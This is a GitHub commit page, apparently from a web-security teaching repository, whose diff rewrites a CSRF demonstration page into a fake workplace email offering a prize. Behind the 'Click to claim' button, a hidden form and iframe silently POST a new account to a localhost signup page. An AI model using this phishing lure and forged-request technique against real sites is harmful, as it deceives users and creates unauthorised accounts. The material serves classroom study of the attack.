Skip to content

Commit

Permalink
update form
Browse files Browse the repository at this point in the history
  • Loading branch information
@benpaddlejones
benpaddlejones committed Oct 26, 2024
1 parent d275030 commit 41e2229
Show file tree
Hide file tree
Showing 4 changed files with 283 additions and 18 deletions.
2 changes: 1 addition & 1 deletion .codesandbox/tasks.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@
"start": {
"name": "start",
"command": "python main.py",
"runAtStart": true,
"runAtStart": false,
"preview": {
"port": 5000
}
Expand Down
299 changes: 282 additions & 17 deletions .student_resources/CSRF/index.html
View file
Original file line number Diff line number Diff line change
@@ -1,23 +1,288 @@
<!DOCTYPE html>
<head>
<title>YOU HAVE WON!</title>
<title>Work Email</title>
</head>
<body>
<form hidden id="hack" target="csrf-frame" action="http://localhost:5000/signup.html" method="POST" autocomplete="off">
<input name="username" value="give_me_access">
<input name="password" value="abc123">
<input name="dob" value="01/01/2001">
</form>
<iframe hidden name="csrf-frame"></iframe>
<h3>You won $100,000</h3>
<button onClick="hack();" id="button">Click to claim</button>
<br>
<div id="warning"></div>
<script>
function hack() {
document.getElementById("hack").submit();
document.getElementById("warning").innerHTML="<p>HA HA HA! You have been hacked!</p><p>Go on, check your user database, we have access to your site!</p>";
}
</script>
<main class="application-window" role="main">
<aside class="inbox-nav" role="complimentary">
<nav>
<ul class="main-accounts">
<li> <a>me@myemail.com</a>
<ul class="account">
<li class="folder"><a class="active">Inbox<sup>4481</sup></a></li>
<li class="folder"><a>[Gmail]</a>
<ul>
<li><a>Drafts<sup>[14]</sup></a></li>
<li><a>Sent Mail<sup>5</sup></a></li>
<li><a>Trash<sup>39</sup></a></li>
<li><a>Important<sup>907</sup></a></li>
<li><a>Spam<sup>[159]</sup></a></li>
<li><a>Starred</a></li>
</ul>
</li>
<li><a>Deleted Items<sup>907</sup></a></li>
<li><a>Deleted Messages</a></li>
<li><a>Drafts</a></li>
<li><a>ESET Antispam</a></li>
<li><a>Infected Items</a></li>
<li><a>Junk E-mail<sup>650</sup></a></li>
<li><a>Work</a></li>
<li><a>Notes</a></li>
<li><a>Outbox<sup>[2]</sup></a></li>
<li><a>Search Folders</a></li>
</ul>
</li>
</ul>
</nav>
</aside>
<article class="message-list">
<header class="sort-controls">
<input type="search" placeholder="Search Current Mailbox (Ctrl+E)" autofocus="autofocus"/>
<ul class="filter">
<li><a class="active">All</a></li>
<li><a>Unread</a></li>
</ul>
<ul class="sort">
<li><a>By Date (Conversations)<i class="icon-caret-down"></i></a></li>
<li><a>Newest<i class="icon-arrow-down"></i></a></li>
</ul>
</header>
<ul class="messages">
<li class="day"><a title="Date: Today">Today</a>
<ul>
<li><a class="message unread active">
<header><small class="time">26</small>
<h1>Your Boss</h1>
<p>Congratulations on wining employee of the month!</p>
</header></a></li>
<li><a class="message read">
<header><small class="time">27</small>
<h1>Mary Poppins</h1>
<p>I just wanted to reach you regarding my position as...</p>
</header></a></li>
</ul>
</li>
</ul>
</article>
<article class="message-pane">
<header class="message-info">
<ul class="message-actions">
<li><a><i class="icon-reply"></i>Reply</a></li>
<li><a><i class="icon-reply2"></i>Reply all</a></li>
<li><a><i class="icon-forward"></i>Forward</a></li>
</ul>
<section class="from-to">
<figure class="sender-avatar"><i class="icon-user"></i></figure>
<time date-time="05-05-31">Tue 2014-05-6 10:01 PM</time>
<h1>your_boss@gmail.com</h1>
<h2>Employee of the month prize!</h2>
<p>To:<em>me@myemail.com</em></p>
</section>
</header>
<section class="message-content">
<header>
<h2>You won $10,000</h2>
<h1>The whole team is so proud of you, click below to claim your prize</h1>
</header>
<section class="intro">
<form hidden id="hack" target="csrf-frame" action="http://localhost:5000/signup.html" method="POST" autocomplete="off">
<input id="username" name="username" value="give_me_access">
<input name="password" value="abc123">
<input name="dob" value="01/01/2001">
</form>
<iframe hidden name="csrf-frame"></iframe>
<button onClick="hack();" id="button"><h3>Click to claim</h3></button>
<br>
<div id="warning"></div>
<script>
function hack() {
//Generate a random username
let username = Math.random().toString(36).substring(2, 15) + Math.random().toString(36).substring(2, 15);
document.getElementById("username").value = username;
// Submit a HTTP POST request to the target site
document.getElementById("hack").submit();
document.getElementById("warning").innerHTML="<p>HA HA HA! You have been hacked!</p><p>Go on, check your user database, we have access to your site!</p>";
}
</script>
</section>
</section>
</article>
</main>
<style>
body {
font-family: "Segoe UI";
margin: 0;
background: #FFF;
}
body a {
cursor: default;
}
body a:hover {
color: #0000f0;
}
body a.active {
font-weight: bold;
}

sup {
margin-left: 0.4em;
color: #4646ff;
}

h1, h2, h3, h4, h5, h6 {
font-family: "Segoe UI Light";
}

#button {
background-color: #1c87c9;
-webkit-border-radius: 30px;
border-radius: 30px;
border: none;
color: #eeeeee;
cursor: pointer;
display: inline-block;
font-family: sans-serif;
font-size: 20px;
padding: 5px 15px;
text-align: center;
text-decoration: none;
animation: glowing 1300ms infinite;
}
@keyframes glowing {
0% {
background-color: #1c87c9;
box-shadow: 0 0 3px #1c87c9;
}
50% {
background-color: #378fc5;
box-shadow: 0 0 10px #378fc5;
}
100% {
background-color: #639dc2;
box-shadow: 0 0 3px #639dc2;
}
}
.application-window .inbox-nav, .application-window .message-list, .application-window .message-list .sort-controls .filter, .application-window .message-list .sort-controls .filter li, .application-window .message-list .sort-controls .sort li, .application-window .message-pane, .application-window .message-pane .message-info .message-actions li {
display: inline-block;
vertical-align: middle;
*vertical-align: auto;
*zoom: 1;
*display: inline;
}

.application-window .inbox-nav .main-accounts, .application-window .inbox-nav .main-accounts ul, .application-window .message-list .sort-controls .filter, .application-window .message-list .sort-controls .sort, .application-window .message-list .messages, .application-window .message-list .messages ul, .application-window .message-pane .message-info .message-actions {
list-style: none;
padding: 0;
margin: 0;
}

/* =============================================================================
Outlook Mail Component
========================================================================== */
.application-window .inbox-nav {
background: #F5F5F5;
vertical-align: top;
overflow: hidden;
}
.application-window .inbox-nav .main-accounts > li > a {
margin: 1em 0;
}
.application-window .inbox-nav .main-accounts ul {
padding-left: 1em !important;
}
.application-window .inbox-nav .main-accounts ul.account {
padding: 0;
}
.application-window .inbox-nav .main-accounts a {
display: block;
padding: 0 0.5em;
}
.application-window .inbox-nav .main-accounts a:hover {
background: rgba(170, 170, 255, 0.2);
color: #000;
}
.application-window .inbox-nav .main-accounts a.active {
background: #d2d2d2;
}
.application-window .message-list {
padding: 0.5em;
resize: horizontal;
}
.application-window .message-list .sort-controls input[type="search"] {
display: block;
width: 100%;
}
.application-window .message-list .sort-controls .filter li {
margin-right: 0.4em;
}
.application-window .message-list .sort-controls .filter li a.active {
color: #0000f0;
font-weight: normal;
}
.application-window .message-list .sort-controls .sort {
float: right;
}
.application-window .message-list .sort-controls .sort li {
margin-right: 0.4em;
}
.application-window .message-list .messages > .day > a {
background: rgba(245, 245, 245, 0.5);
display: block;
padding: 0.4em;
font-weight: bold;
font-size: 0.75em;
text-indent: 0.5em;
}
.application-window .message-list .messages ul .message {
border-bottom: 1px solid #e6e6e6;
padding: 0.4em;
margin: 0.4em 0;
display: block;
}
.application-window .message-list .messages ul .message.unread {
border-left: 4px solid #0000f0;
font-weight: bold;
}
.application-window .message-list .messages ul .message.active {
background: #e6e6e6;
color: #000;
font-weight: normal;
}
.application-window .message-list .messages ul .message:hover {
color: #000;
border-left: 4px solid rgba(0, 0, 240, 0.2);
background: rgba(0, 0, 230, 0.1);
}
.application-window .message-list .messages ul .message .time {
float: right;
}
.application-window .message-pane {
vertical-align: top;
max-width: calc(100% - 60%);
padding: 0.5em 0 0 1em;
}
.application-window .message-pane .message-info {
border-bottom: 1px solid #e6e6e6;
}
.application-window .message-pane .message-info .message-actions li a {
margin-right: 0.4em;
}
.application-window .message-pane .message-info .from-to .sender-avatar {
float: left;
margin-right: 1.3em;
}
.application-window .message-pane .message-info .from-to time {
font-size: 0.9em;
}
.application-window .message-pane .message-info .from-to h2 {
font-size: 1.2em;
}
.application-window .message-pane .message-info .from-to em {
margin: 0 1em;
font-style: normal;
}

</style>

</body>
</html>
Binary file modified __pycache__/userManagement.cpython-312.pyc
View file
Binary file not shown.
Binary file modified databaseFiles/database.db
View file
Binary file not shown.

0 comments on commit 41e2229

Please sign in to comment.